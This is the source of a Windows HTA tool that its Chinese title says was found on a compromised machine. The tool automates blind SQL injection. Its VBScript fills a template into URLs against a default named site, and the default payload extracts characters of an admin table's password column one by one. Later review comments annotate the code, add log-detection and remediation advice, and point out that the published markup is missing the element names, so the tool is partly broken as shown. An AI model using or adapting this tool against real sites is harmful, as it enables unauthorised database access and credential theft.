
在肉鸡上发现的SQL注入网页形式版

<HEAD>
<!-- HTML Application (HTA) header. An .hta file is executed by mshta.exe as a
     desktop application with the logged-on user's privileges and without the
     browser's security-zone restrictions. The attributes below only configure
     the window; ICON borrows the icon of Explorer.exe.
     For triage, the TITLE text and the APPLICATIONNAME value are fixed strings
     that can be searched for on disk.
     NOTE(review): INGLEINSTANCE is not an HTA attribute name as written
     (SINGLEINSTANCE is); presumably a character was lost in publication. -->
<TITLE> SQL Class Tools - By Sunhack</TITLE>
<HTA:APPLICATION
APPLICATIONNAME="Lilo"
BORDER ="dialog window"
BORDERSTYLE ="raised"
CAPTION ="yes"
ICON ="%windir%\Explorer.exe"
MAXIMIZEBUTTON ="no"
MINIMIZEBUTTON ="yes"
SHOWINTASKBAR ="YES"
INGLEINSTANCE ="no"
SYSMENU ="yes"
VERSION ="1.0"
WINDOWSTATE ="normal">
<!-- Presentation only: 9pt text and thin borders for the text boxes and buttons. -->
<style>body{font-size:9pt;border:0pt}input{font-size:9pt}
.textbox {BORDER-BOTTOM: #00378A 2px solid; BORDER-LEFT: 1px solid; BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid}
.vbutton {BORDER-BOTTOM: 1px solid; BORDER-LEFT: 1px solid; BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid ;
padding-top:2pt;padding-bottom:-1pt}
</style>
<Script Language="vbScript">
<!--
' Size the HTA window to 840 x 650 and centre it on the screen.
' window.resizeTo takes (width, height), so 840 is the width and 650 the height.
Sub Main
    Const WIN_W = 840
    Const WIN_H = 650
    window.resizeTo WIN_W, WIN_H
    window.moveTo (screen.width - WIN_W) / 2, (screen.height - WIN_H) / 2
End Sub
' Build the request URL the tool will load: the text of inSQL with its bracketed
' placeholders filled in, appended to inURL and followed by inEND.
' Returns Empty (the function name is never assigned) when inURL or inSQL is
' blank, when inURL does not contain "http://", or when it is exactly "http://".
' Every value comes from a form control and is concatenated with no encoding or
' validation, so the SQL fragment travels in clear text in the GET query string
' and is recorded as such in the receiving server's access log.
' NOTE(review): inURL, inSQL, inBAS, inTAB, inFIL, inNUM, inCRM and inEND are not
' declared in the markup as shown (the inputs carry no name/id); presumably the
' attributes were lost when the page was published.
Function GetStrThis()
    ' Guard: nothing is built unless both the address and the template are present.
    If inURL.Value ="" Or inSQL.Value="" Or inStr(inURL.Value ,"http://") = 0 Or inURL.Value = "http://" Then Exit Function
    GetStrThis= inSQL.Value
    ' Placeholder substitution, in this order: [B], [T], [F], [M], [N].
    GetStrThis= Replace(GetStrThis,"[B]",inBAS.Value)
    GetStrThis= Replace(GetStrThis,"[T]",inTAB.Value)
    GetStrThis= Replace(GetStrThis,"[F]",inFIL.Value)
    GetStrThis= Replace(GetStrThis,"[M]",inNUM.Value)
    GetStrThis= Replace(GetStrThis,"[N]",inCRM.Value)
    ' NOTE(review): as shown, this Replace swaps a space for a space and so changes
    ' nothing; the original arguments may have been altered by the page rendering.
    GetStrThis= Replace(inURL.Value & " " & GetStrThis & inEND.Value," "," ")
End Function
' Click handler: blank the GoWhere frame, write a short waiting message into it,
' then navigate the frame to the URL returned by GetStrThis. The response is
' rendered in the frame; the script itself never inspects it.
' NOTE(review): GoWhere is presumably the iframe at the bottom of the form; the
' markup as shown gives that iframe no name.
' NOTE(review): when GetStrThis returns Empty (failed guard) the frame location is
' still assigned; there is no check here.
Function GoCreak_onClick()
    GoWhere.Location.Href="about:blank"
    ' The markup inside this string is malformed as shown; it is runtime text and is left as is.
    GoWhere.document.write "<center><fontfont-size:9pt;color:RED''>Waitting For Open New URL...</font></center>"
    GoWhere.Location.Href=GetStrThis
End Function
' Click handler: show the URL built by GetStrThis in a message box instead of
' requesting it. 4096 is vbSystemModal; the title text means "show injection URL".
Function SoCreak_onClick()
    Msgbox GetStrThis , 4096 ,"显示注入URL"
End Function
' Click handler: display the character whose code is held in inCRM, padded with
' spaces on both sides so it sits near the middle of the message box.
Function Show_onClick()
    Dim shown
    shown = String(23," ") & Chr(inCRM.Value) & String(25," ")
    Msgbox shown , 0 ,"ASCII To CHAR"
End Function
' Document click handler that does nothing: its only statement is commented out.
Function Document_onClick()
    ''Window.Focus()
End Function
' Toggle the suffix that GetStrThis appends after the template: when inEND is
' empty it is set to the quote-balancing fragment below, otherwise it is cleared.
' NOTE(review): nothing in the source as shown calls this function.
' NOTE(review): the run of apostrophes in the literal looks like an artefact of the
' page's escaping; it is runtime text and is kept exactly as published.
Function inENDStr()
    If inEND.Value="" Then inEND.Value=" and ''''=''" Else inEND.Value=""
End Function
' Key handler: pressing Enter (key code 13) anywhere in the document does the
' same as clicking the button handled by GoCreak_onClick.
Function Document_onKeyPress()
    Const KEY_ENTER = 13
    If Window.Event.keyCode = KEY_ENTER Then
        Call GoCreak_onClick()
    End If
End Function
' Top-level statement: runs when the script block is loaded, so the window is
' resized and centred by Main before the form is shown.
Call Main
-->
</Script>
<Script Language="JavaScript">
// Return the element that raised the current event, read from the global
// `event` object. Nothing in the markup shown on this page calls it.
function vSelect() {
  return event.srcElement;
}
</Script>
</HEAD>
<body scroll="no">
<!-- Operator form. As shown, none of the inputs, buttons or the iframe has a
     name/id or an event attribute, so the script's references (inURL, inSQL,
     inBAS, inTAB, inFIL, inNUM, inCRM, inEND, GoWhere, GoCreak, SoCreak, Show)
     have nothing to bind to; presumably those attributes were stripped when the
     page was published. -->
<Center>
<!-- Address box: the base URL to which the filled-in template is appended. -->
地址:<input type="text" size="95" value="http://www.my-china.net/xSQL/index.asp?id=1"><BR><BR>
<!-- Placeholder values. In the default template below, [T] is used as a table
     name, [F] as a column name, [M] as a character position and [N] as a
     character code; [B] is not used by the default template. -->
[B]:<input type="text" size="7" value="">
[T]:<input type="text" size="7" value="admin">
[F]:<input type="text" size="7" value="id">
[M]:<input type="text" size="7" value="1"> [N]:
<input type="text" size="7" Value="33">
<input type="button" value=" 显示ASCII ">
[W]:<input type="text" size="10" value=""> [<font color="Red">*</font>]
<br><br>
<!-- Query template. The default is an inference probe: it compares the character
     code at one position of a `password` column with a number and depends on the
     page answering differently for true and false.
     For defenders: GET requests whose query string contains `select top 1`
     together with `asc(mid(` are a strong access-log indicator for this kind of
     tool. The durable fix is on the application side: a parameterised query (or
     strict integer parsing of `id`), a least-privileged database account, and
     salted password hashes so that a disclosed column is not directly usable. -->
<input type="text" size="92" value="and (select top 1 [F] from [T] where [F]=1 and asc(mid(password,[M],1))>[N])">
<input type="button" value=" 尝试 ">
<input type="button" value=" 显示 ">
<br><BR>
<!-- Result frame: the response to each request is rendered here. -->
<iframe align=center frameborder="0" width=810 height=480 scrolling=auto src="about:blank"></iframe>
</center>
